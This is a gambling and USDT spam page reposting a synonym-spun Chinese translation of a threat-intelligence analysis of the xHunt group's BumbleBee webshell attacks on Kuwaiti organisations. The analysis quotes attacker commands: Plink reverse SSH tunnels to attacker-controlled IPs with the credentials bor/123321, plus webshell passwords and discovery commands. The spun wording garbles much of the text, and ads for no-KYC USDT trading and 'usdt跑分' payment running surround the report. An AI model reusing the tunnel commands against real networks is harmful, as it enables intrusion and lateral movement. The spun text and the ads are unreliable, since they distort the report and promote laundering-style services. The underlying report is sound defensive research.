欢迎进入UG环球官网(环球UG)!

usdt提现教程(www.caibao.it):xHunt的最新攻击手段剖析:通过BumbleBee Webshell提议攻击(下)

admin4周前221

USDT官网

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

xHunt的最新攻击手段剖析:通过BumbleBee Webshell提议攻击(上)

攻击者若何通过BumbleBee提议攻击

关于BumbleBee Webshell流动,IIS日志中的主要信息有:

HTTP请求的时间戳;

攻击者的IP地址;

HTTP请求中的用户署理提供了攻击者的操作系统和浏览器版本;

URL参数中的ClientId是Exchange服务器通过服务器端cookie提供的客户端的唯一标识符;

凭证研究职员网络到的日志,附录中的表1提供了有关攻击者使用BumbleBee webshell的流动时间表,该时间表始于2020年2月1日。在确立此时间轴时,研究职员注重到攻击者与BumbleBee交互时显示出一些有趣的可考察性和行为,包罗:

1.攻击者使用的所有IP地址(除了一个IP地址以外)都与专用Internet接见提供的VPN相关联,而另一个IP地址属于FalcoVPN。

2.攻击者在差异位置的VPN服务器之间切换以更改IP地址,而且似乎来自差其余国家,稀奇是比利时、德国、爱尔兰、意大利、卢森堡、荷兰、波兰、葡萄牙、瑞典和英国。

3.当与BumbleBee交互时,攻击者使用了操作系统和浏览器的组合,稀奇是Windows 10,Windows 8.1或Linux系统上的FireFox或Chrome。

通过BumbleBee执行的下令

如前所述,科威特组织的受攻击Exchange服务器不会在IIS日志中纪录POST数据,因此研究职员无法提取在BumbleBee WebShell上运行的下令。然则,研究职员使用了一样的时间戳来将IIS日志中的流动与Cortex XDR日志中看到的下令提醒符流动相关联,以确定在服务器上执行的下令。不幸的是,直到2020年9月16日,研究职员才对BumbleBee上执行的下令具有可见性,那时Cortex XDR已安装在受熏染的Exchange服务器上,以响应可疑流动。研究职员还能够确定在两个其他科威特组织之一的内部IIS Web服务器上托管的BumbleBee Webshell上运行的下令。

凭证Cortex XDR日志,攻击者在2020年9月16日破费了3小时37分钟,通过受熏染的Exchange服务器上安装的BumbleBee Webshell运行下令。附录中的表2显示了所有下令和最能形貌所执行流动的MITER ATT&CK手艺标识符。这些下令显示攻击者举行了如下操作:

1.使用ping和net group下令以及PowerShell(T1059.001)执行网络发现(T1018),以查找网络上的其他盘算机。

2.使用whoami和quser下令执行帐户发现(T1087);

3.使用W32tm和time下令确定系统时间(T1124);

4.使用Plink(RTQ.exe)确立到远程主机的SSH隧道(T1572);

5.通过SSH隧道使用RDP(T1021.001)来控制受熏染的盘算机;

6.通过安装共享文件夹,将Plink(RTQ.exe)复制到远程系统并使用Windows Management Instrumentation(WMI)(T1047)横向移动(T1570)到另一个系统,以确立用于RDP接见的SSH隧道。

7.在发出下令后,通过删除(T1070.004)BumbleBee来删除其存在的证据;

,

USDT跑分

U交所(www.9cx.net)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。

,

附录中表2中列出的下令还显示了使用Plink(RTQ.exe)来确立到外部IP地址192.119.110[.]194的SSH隧道的攻击者,如以下下令所示:

echo y | c:\windows\temp\RTQ.exe 192.119.110[.]194 -C -R 0.0.0.0:8081::3389 -l bor -pw 123321 -P 443

这个IP地址与将在后面讨论的其他相关基础设施一样,最主要的是,用于确立SSH隧道的bor和123321的用户名和密码与以前的xHunt流动一样。这些确切的凭证在Sakabota工具内的备忘单中列出,该备忘单中提供了示例下令,攻击者可以使用该下令使用Plink确立SSH隧道。研究职员信托攻击者使用备忘单中的示例下令作为他们通过BumbleBee确立SSH隧道所使用下令的基础。

攻击者确立这些SSH隧道以毗邻到Windows系统上的非Internet可接见RDP服务,稀奇是使用RDP与受熏染的系统举行交互并使用图形用户界面(GUI)应用程序。攻击者还使用这些SSH隧道横向移动到网络上的其他系统,稀奇是接见无法从Internet远程接见的内部系统,如图2所示。

可视化的xHunt 攻击者从在托管BumbleBee的可接见Internet的服务器上确立的SSH隧道接见内部系统的情形

除了剖析在受熏染的Exchange服务器上执行的下令之外,研究职员还剖析了在另两个科威特组织之一托管的内部IIS Web服务器上的BumbleBee Webshell上执行的下令。 2020年9月10日,研究职员发现该攻击者运行了几个下令来执行网络和用户帐户发现。此外,攻击者使用BumbleBee上传了第二个Webshell,文件名为cq.aspx。攻击者使用第二个Webshell运行PowerShell剧本,该剧本向Microsoft SQL Server数据库发出SQL查询。

攻击者首先发出一个SQL查询以检查SQL Server的版本,然后攻击者发出两个附加查询,这些查询是特定于IIS Web服务器上运行的Web应用程序的。用于发出SQL查询的PowerShell剧本与Microsoft Technet论坛文章“通过PowerShell运行SQL”中包罗的剧本异常相似,这解释攻击者可能已将该论坛文章用作PowerShell剧本的基础。研究职员无法获得第二个Webshell,由于攻击者在完成后通过BumbleBee Webshell删除了它。附录中的表3显示了2020年9月10日通过BumbleBee执行的下令。

托管用于宣布表3中的下令的BumbleBee WebShell的IIS Web服务器上的日志仅包罗流动源的内部IP地址。内部IP地址解释该Web服务器不能公然接见,而且未公然攻击者的源IP地址。然则,所有实验接见BumbleBee并运行表3中的下令的实验都将192.119.110[.]194:8083作为Web服务器日志中引荐泉源网址的URL中的主机。引荐泉源网址字段中的此外部IP地址解释攻击者正在通过SSH隧道接见BumbleBee。 Referrer字段中的IP地址也与在受熏染的Exchange服务器上考察到的为RDP接见确立SSH隧道的下令相同,如表2所示。

文件上传程序和SSH隧道

在研究历程中,研究职员发现了第二个BumbleBee Webshell,该Webshell托管在最初的科威特组织的内部IIS Web服务器上,以及其他两个科威特组织的内部IIS Web服务器上。与研究职员剖析的第一个示例相比,此BumbleBee webshell有差其余查看和运行下令的密码。第二个BumbleBee WebShell要求攻击者在适当命名的URL参数中包罗密码TshuYoOARg3fndI。与最初的BumbleBee示例一样,研究职员不知道攻击者必须包罗密码才气在Webshell上运行下令。

通过剖析内部IIS Web服务器上的构件,研究职员能够确定,攻击者在2020年7月16日运行了类似的下令,以使用Plink确立SSH隧道,如附录表2所示。研究职员确定攻击者执行的下令使用与xHunt备忘单https://unit42.paloaltonetworks.com/xhunt-actors-cheat-sheet/中相同的用户名和密码,但具有由攻击者控制的差异外部IP地址,如下所示:

1.exe 142.11.211[.]79 -C -R 0.0.0.0:8080:10.x.x.x:80 -l bor -pw 123321 -P 443
 SVROOT.exe 142.11.211[.]79 -C -R 0.0.0.0:8081:10.x.x.x:80 -l bor -pw 123321 -P 443

这些下令与在受熏染的Exchange服务器上确立SSH隧道所使用的下令差异,该下令允许攻击者通过TCP端口3389使用RDP毗邻到服务器。上面的下令试图确立一个隧道,以允许攻击者通过TCP端口80接见托管在其他内部服务器上的web服务器。研究职员信托攻击者使用这些SSH隧道来接见其他内部网络上的Web服务器,希望在这些服务器上找到类似的文件上传功效。若是找到,研究职员信托攻击者会使用文件上传功效来上传Webshell,以攻击远程服务器的横向移动。

研究职员检查了包罗BumbleBee Webshell流动的IIS日志,并在入站HTTP请求的引荐泉源网址的URL中找到了三个外部IP地址。这些IP地址在Referrer字段中的存在解释,攻击者通过在其浏览器的URL字段中包罗以下IP和TCP端口,来使用SSH隧道接见Web服务器:

142.11.211[.]79:8080
142.11.211[.]79:8081
91.92.109[.]59:1234
91.92.109[.]59:1255
91.92.109[.]59:1288
91.92.109[.]59:1289
192.119.110[.]194:8083

相关的xHunt基础架构

到受熏染的Exchange服务器上托管的BumbleBee Webshell的入站请求没有提供到其他xHunt基础结构的任何像样的枢轴点(Pivot Point),由于所有外部IP地址都是攻击者与Webshell交互时使用的VPN服务器。幸运的是,研究职员能够提取已知的xHunt基础结构,用作攻击者确立的SSH隧道的远程服务器,以通过RDP和内部Web服务接见系统。用于SSH隧道的三台外部服务器是192.119.110[.]194,142.11.211[.]79 ,91.92.109[.]59,它们与图3中的其他基础结构一样。

backendloop[.]online
 bestmg[.]info
 window *** icrosofte[.]online

与用于SSH隧道的xHunt服务器关联的基础架构

这三个用于SSH隧道远程位置的IP地址剖析到域ns1.backendloop[.]online和ns2.backendloop[.]online。最近,这两个域的IP地址已剖析为192.255.166[.]158,这可能解释攻击者在当前操作中正使用该IP地址上的服务器。 91.92.109[.]59地址还剖析到以下域中的各个子域,解释它们也是攻击者基础结构的一部门:

backendloop[.]online
 bestmg[.]info
 window *** icrosofte[.]online

window *** icrosofte[.]online域包罗子字符串microsofte,该字符串在microsofte-update[.]com的Hisoka C2域中可见,正如研究职员在xHunt对科威特航运和运输组织的攻击的初始讲述提到的那样。不幸的是,研究职员在剖析中没有看到攻击者使用的任何这些域,因此研究职员无法在操作中确定它们的目的。

总结

当攻击者在一个科威特组织的受攻击Exchange服务器上安装了一个研究职员称为BumbleBee的webshell时,xHunt流动继续举行,研究职员发现该Webshell托管在统一网络的内部IIS Web服务器上。研究职员还在其他两个科威特组织的两个内部IIS Web服务器上发现了BumbleBee。虽然研究职员知道攻击者使用Web应用程序的文件上传功效将BumbleBee安装到内部IIS Web服务器上,但研究职员仍然不确定攻击者是否通过行使破绽或通过从Windows的另一个系统横向移动来将BumbleBee安装在受熏染的Exchange服务器上。

攻击者使用BumbleBee在科威特三个组织的受熏染服务器上运行下令,包罗发现用户帐户和网络上其他系统的下令,以及横向移动到网络上其他系统的下令。此外,攻击者还确立了SSH隧道,以通过RDP接见系统并从攻击者控制的外部服务器接见内部Web服务器。该攻击者使用了与研究职员在Sakabota工具中包罗的备忘单中考察到的SSH隧道相同的用户名和密码,该工具由该攻击者开发并专门使用的。

在其中两个科威特组织中,攻击者正在使用SSH隧道使用的外部服务器,这解释该攻击者在与多个目的网络举行交互时会重用基础结构。这些外部服务器还剖析到几个相关的域,这解释它们不仅用于确立SSH隧道,而且更普遍地用于其他部门的基础结构。

凭证此剖析,研究职员确定攻击者在直接与目的网络举行交互以隐藏其真实位置时,更喜欢使用Private Internet Access提供的VPN。当在webshell上宣布下令时,攻击者还经常切换VPN服务器,以使流动看起来起源于许多差其余国家。当攻击者登录科威特组织的Exchange服务器上的受熏染电子邮件帐户时,他们还使用VPN,他们专门在其中查找与helpdesk相关的电子邮件和由平安警报天生的电子邮件。隐藏他们的位置的实验以及对查看电子邮件的关注,这些电子邮件可能会将攻击者的存在通知给受到攻击的网络的治理员,这可能就是攻击者若何能够在受熏染的网络上隐藏数月之久的缘故原由。

本文翻译自:https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/
上一篇 下一篇

猜你喜欢

网友评论

  • 2021-06-11 00:02:12

    由于特区政府已开宗明义要收缩开支,今年度对57个总会,合计批出约1,600几万澳门元作为牢靠资助,平均各总会被削减8至10%资助不等。「基本办流动支出稳固,但个体分外破费上会被削。」体育局局长潘永权示意。我都看十遍了

随机文章
热门文章
热评文章
热门标签